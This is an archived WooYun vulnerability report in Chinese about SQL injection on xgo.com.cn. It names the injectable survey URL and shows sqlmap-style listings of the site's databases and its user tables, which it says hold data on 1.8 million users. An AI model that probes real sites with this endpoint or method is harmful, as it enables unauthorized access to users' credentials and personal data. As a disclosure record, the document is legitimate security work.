乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-21: 细节已通知厂商并且等待厂商处理中 2015-09-26: 厂商已经主动忽略漏洞,细节向公众公开
http://api.xgo.com.cn/show_survey.php?surveyid=2
available databases [20]:[*] information_schema[*] test[*] xgo_active[*] xgo_bbs[*] xgo_bbs_admin[*] xgo_bbs_troop[*] xgo_comment[*] xgo_picture[*] xgo_plugin[*] xgo_product[*] xgo_product_stat[*] xgo_review[*] xgo_stat_hits[*] xgo_tips[*] xgo_tips_admin[*] xgo_topic[*] xgo_tuan[*] xgo_user[*] xgo_yongpin[*] xgo_zhuqu
Database: xgo_user[92 tables]+---------------------------+| user_relations | | userinfo | | user_active_log | | user_checkimg | | user_album_pic | | user_check_mobile_code | | user_online | | user_real | | user_extend | | user_mail_set | | user_message_2011 | | user_message_2014 | | user_register_log | | user_message_2013 | | user_message | | user_album_info | | user_score | | user_check_mail_code | | user_oltime_2015 | | user_message_2012 | | user_oltime_2011 | | user_oltime_2013 | | userinfo_test | | userinfo_new | | user_visitor | | user_oltime_2012 | | user_oltime_2014 | | x_invite_code | | z_login_api | | z_api_token | | tag_from_pic | | tag_from_user | | user_car_list_product_rel | | x_user_score | | x_userinfo_extend | | x_log_login_2013 | | audit_log | | x_check_mail_code | | user_comments | | x_log_send_mail_2013 | | user_tag2 | | x_register_history | | user_album_pic_tags | | user_carport | | china_city | | x_check_mobile_code | | x_user_car | | x_log_login_2015 | | user_interest_doc0 | | user_book_collection | | x_log_login_2014 | | x_log_send_mail_2014 | | whitelistuser | | x_log_modify_pwd_2013 | | user_obj_comments | | tag | | user_car_list | | user_tag_num | | x_register | | x_log_send_mail_2015 | | checkimg_group | | china_town | | gift_present | | tag_user9 | | tag_user1 | | tag_user8 | | x_oauth_bind | | user_owner_info | | tag_user7 | | tag_user3 | | user_hide | | x_log_modify_pwd_2014 | | tag_user5 | | tag_user6 | | z_login_api_bark | | tag_user4 || gift_buy | | tag_user2 | | x_log_modify_pwd_2015 | | user_interest_doc17 | | user_car_list_vote_1 | | tag_user10 | | user_interest_doc18 | | china_province | | user_tag1 | | gift | | user_active_cate | | user_rank | | gift_sort | | user_modify_pw_log | | x_user_verify | | xgo_qq_session | +---------------------------+
涉及180万用户信息:
涉及登录用户名,密码,邮箱,手机等信息:
危害等级:无影响厂商忽略
忽略时间:2015-09-26 11:26
漏洞Rank:15 (WooYun评价)
暂无